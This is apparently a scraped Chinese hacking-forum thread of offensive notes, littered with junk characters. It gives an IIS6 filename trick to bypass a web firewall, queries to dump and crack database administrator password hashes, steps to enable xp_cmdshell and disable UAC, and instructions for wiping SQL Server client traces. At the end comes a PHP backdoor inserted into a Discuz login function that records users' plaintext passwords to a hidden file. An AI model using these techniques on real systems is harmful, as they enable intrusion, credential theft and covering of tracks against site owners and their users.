1 E" ~- d4 y$ {, l; b; D7 G; f6 Z利用II6文件解析漏洞绕过安全狗代码:) z7 W0 ~' s* {" C$ |
;antian365.asp;antian365.jpg( @+ J2 G2 \) k) P, o+ J
# _- ^1 P3 P( p+ T6 d; ^各种类型数据库抓HASH破解最高权限密码!
m/ P+ c" g4 Q+ s2 q1.sql server2000& F, o9 S- _ d) q; Y, }
SELECT password from master.dbo.sysxlogins where name='sa'* L) ~5 T! V, R- f
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
3 ?1 \4 g$ w5 H: n" r' ]( v2FD54D6119FFF04129A1D72E7C3194F7284A7F3A6 E3 z5 v% H ~9 D1 i
4 s1 k( X$ }$ {( i) E4 s0×0100- constant header
% v) i- q0 f0 N9 g% C5 I7 T34767D5C- salt
/ i0 B3 o5 g3 s, R# I v0 |1 f) n5 V0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
' |1 Z* `/ Q- Q2 j. `1 H6 _2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
# L' p4 \/ i; O5 Y! d" Tcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
; I! S9 I3 G9 o$ N F+ [' cSQL server 2005:-2 X$ h: i" C- s+ v, {% K0 h
SELECT password_hash FROM sys.sql_logins where name='sa'0 h( [3 P4 [( l( X
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F8 F' M. A( o& {; D9 ~6 w
0×0100- constant header
* O8 P. T# h9 P5 L993BF231-salt: s1 e/ x/ }: s& b
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
- S+ t& E! H* o) w0 Xcrack case sensitive hash in cain, try brute force and dictionary based attacks. ^0 `$ X0 @! ~+ p% n7 V
/ l* O+ m& P9 o/ l% R' G! j; Aupdate:- following bernardo’s comments:-7 F0 V/ t; P& Q/ H( |
use function fn_varbintohexstr() to cast password in a hex string.1 |" U* G( s( B6 h
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins5 v; B# l- |3 ^" Q3 x9 }. G) f
% J+ W6 ?( J6 j9 }1 w& ?
MYSQL:-
& E/ U* o9 ^7 ?) C3 x7 C* [- h+ o4 B
0 t* w; m: u' a% F: l0 G9 |In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
: R! j6 L/ F6 c7 y& R$ I3 f9 O9 a' c7 M) B7 @" P' y( Z
*mysql < 4.1
' G9 x) J8 w' [ ~
, @- H3 r. U4 kmysql> SELECT PASSWORD(‘mypass’);
( l% r1 R# K! O, J$ R, Q6 {+——————–+& v8 t% y9 ^9 o5 Y) v
| PASSWORD(‘mypass’) |
& B, o _! C0 M/ S6 ^, [) z+——————–+
4 S9 ^4 m& M$ l| 6f8c114b58f2ce9e |: E! ~- b. D8 `& @* E& y+ Y
+——————–+3 `; e$ K) [ R2 M6 h
* ]' d' Z1 d$ K/ F: q*mysql >=4.13 I# g4 C4 j2 O# T X
' L" g' g) t& \1 b
mysql> SELECT PASSWORD(‘mypass’);
: G/ f$ B9 P7 q( J( `2 j+——————————————-+& g; `$ H# Q# c7 b) E3 ^1 k
| PASSWORD(‘mypass’) |( Z4 W$ R" t( X1 |. T
+——————————————-+9 v, G$ X: [0 P3 u5 Y5 o* M9 |* ?
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |) Y; ]; E! X0 o) b
+——————————————-+
$ v) q+ b+ a+ ~8 b4 P* E0 c) T% z
Select user, password from mysql.user
8 j) I2 c* v' T7 f# gThe hashes can be cracked in ‘cain and abel’0 l' c; P" M1 M
* @0 [& j2 s1 _1 _1 e) Z; S
Postgres:-% P9 l% L" M+ G. @( n: e& G( j5 ?& f
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
/ W. j. e3 ~& t6 n2 n: {$ Tselect usename, passwd from pg_shadow;
# A9 I/ M* s8 D5 Y' |4 M( [& Lusename | passwd
! e. S( P. n* ]7 r——————+————————————-$ w( s# D% R/ e3 t* e+ P
testuser | md5fabb6d7172aadfda4753bf0507ed4396
0 N# m2 x( p& `6 Ouse mdcrack to crack these hashes:-% ~6 [% ]- g5 k5 F# g
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43961 K$ x8 B L8 f. l
& r5 c- W. W3 h4 O& C7 p5 B% KOracle:-
, x% w3 u" C" K% M5 l: Vselect name, password, spare4 from sys.user$( U- u+ u: L$ ^ U7 j7 [
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g3 `+ a2 K& I3 p2 K- p- v& i8 X
More on Oracle later, i am a bit bored….
* v0 l. x# k3 [- d0 o# k& m
& i. z# d, \! ]8 p% l( Q
( C& r2 j) J7 M) z( P7 ^在sql server2005/2008中开启xp_cmdshell- E& Q& z+ h$ |2 F
-- To allow advanced options to be changed.
2 n5 T/ q' r7 i( F( ]- fEXEC sp_configure 'show advanced options', 1
0 m- R: a) m/ Z) C% X/ GGO; F( o% \; \* |2 L4 F7 `, V/ v
-- To update the currently configured value for advanced options.
8 F# j2 p1 {$ Q, u7 q/ _RECONFIGURE
- P% ~# k9 x7 k2 ]- P) \+ d) M+ XGO5 f- ]: X$ S. K7 w0 `& M0 h
-- To enable the feature.
2 Y* g, W n8 h) ? p/ e) ?EXEC sp_configure 'xp_cmdshell', 1
0 j* R9 L8 A9 v5 @& @& ^GO
& q/ o6 i7 F. v1 T* Y" i1 [-- To update the currently configured value for this feature.
) T! x/ p8 l) J5 X) Y2 dRECONFIGURE
% `3 @! [' w7 B: a/ |1 UGO
- l( {9 Q: a4 w$ mSQL 2008 server日志清除,在清楚前一定要备份。
2 ?# U; N3 q: j2 z$ b如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
8 y' |1 W! I! s+ B! q) D) F/ UX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin6 q0 }5 p, M7 k5 \/ a" P
! f! E2 y7 y2 s* g2 ^1 s
对于SQL Server 2008以前的版本:
1 u7 |4 q# o; ~6 g/ J* B; ^SQL Server 2005:" z* y* b- f! [4 f( x
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
6 G3 K5 r/ D9 N% K+ V. X! m) eSQL Server 2000:
/ N5 C- ]6 t$ Y清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
) d8 ~ Y; |* z- s
# n: K: M1 v" y4 d1 m" _ |本帖最后由 simeon 于 2013-1-3 09:51 编辑# e w, N- w7 W; X1 ?# D- G* i
e& y+ p( B% P+ ]3 ~5 f" x
4 P5 X! a% l6 a
windows 2008 文件权限修改! _6 T! X8 S/ j7 z0 Y
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
8 L( q4 w8 k0 X/ d9 M7 P* h2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
2 |1 J5 h0 y1 _" |) u" T' N8 k3 [一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
+ P ]" b! y" E
+ P( n9 u2 c J+ i+ t5 n. k" mWindows Registry Editor Version 5.00
: m" B( M# w# _- d9 W# a. I[HKEY_CLASSES_ROOT\*\shell\runas]
1 c& ]& X2 b' L- S; p4 A@="管理员取得所有权"
0 t( x" i, M. B' p! n"NoWorkingDirectory"=""9 \# y3 i5 \* r6 N4 R
[HKEY_CLASSES_ROOT\*\shell\runas\command]$ n8 B8 m8 P- Z
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
+ }% y, m3 k" k8 B"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
0 U' I: S* y# r3 ]% a4 {# }[HKEY_CLASSES_ROOT\exefile\shell\runas2]
+ w- C% P' i2 Z) T@="管理员取得所有权"4 h4 m1 P9 X" B% _, {4 a
"NoWorkingDirectory"=""
4 s1 r6 k) G% \[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
. t3 d# l! I f8 n- D0 {6 A2 l0 w@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F", w& D/ Z1 ^; X5 `! s' c# I+ d( y$ w
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
1 \; v. N9 F: q Q0 _" X1 J7 C6 c0 v( W1 b8 J% Z0 l, |0 F% N; R4 f6 @
[HKEY_CLASSES_ROOT\Directory\shell\runas]
9 ~( R+ w1 O9 Z7 x$ I) n4 ]# Y@="管理员取得所有权"
4 V9 p# N( b7 z4 G"NoWorkingDirectory"=""
5 z9 ?: k0 Z+ f5 s* e4 \[HKEY_CLASSES_ROOT\Directory\shell\runas\command]4 |# r. p% J+ y, l! {- i, j# T
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
. v* a" n, z9 J) C' O9 }"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t", n0 X3 u4 l7 S6 o3 b% X& D- E
6 E( k% C9 `8 c2 V3 B' W! i1 u7 p1 u V+ t- ^: ~8 V1 @/ b
win7右键“管理员取得所有权”.reg导入
9 i, E2 f& B1 u [- I二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
7 {- P* L% O8 `1 J1、C:\Windows这个路径的“notepad.exe”不需要替换
" J! _, U: J' v, u$ U* e" o2、C:\Windows\System32这个路径的“notepad.exe”不需要替换" J' K/ u/ X. g7 i6 n- B
3、四个“notepad.exe.mui”不要管
. R% f# R1 o5 G9 X. S8 }4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
! ?7 v, h, N' E1 o6 mC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”$ n. Q( s2 o* w+ `' i
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,, q5 T, F. j2 V7 ?$ x
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。7 g, w( _. ~- H' w# w$ K4 E
windows 2008中关闭安全策略: % Z0 a6 k) e2 F2 t1 Z L; l
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
& l9 j6 t o2 s; k( }2 h6 m修改uc_client目录下的client.php 在! m b2 `9 b0 B- k
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {$ `# P# {- ~' @; n* n" V
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
7 o! G% @6 n( B你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw0 c3 [, o4 U( n" \; k e
if(getenv('HTTP_CLIENT_IP')) {7 E' ~3 m* l5 m: j" F( u
$onlineip = getenv('HTTP_CLIENT_IP');
$ H9 J6 C, K: d6 Y, Z0 g} elseif(getenv('HTTP_X_FORWARDED_FOR')) {* V- _+ V; v1 ?/ T; p% ]/ g
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
7 V' a& i/ R0 u} elseif(getenv('REMOTE_ADDR')) {
$ q+ G5 i( _& \% P! }! l F$onlineip = getenv('REMOTE_ADDR');; b+ `1 J' a6 ^) k6 i
} else {
2 ^5 X/ ^' ^3 `0 e$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
' B6 x2 N/ I4 }* H: n2 ^8 k9 \0 \( [}
" w- {; b& V, U $showtime=date("Y-m-d H:i:s");0 m4 s. C- \2 ]1 T* R5 L
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";+ @& d/ d! y3 |
$handle=fopen('./data/cache/csslog.php','a+');2 [5 w8 V; h/ t D. i" C J
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对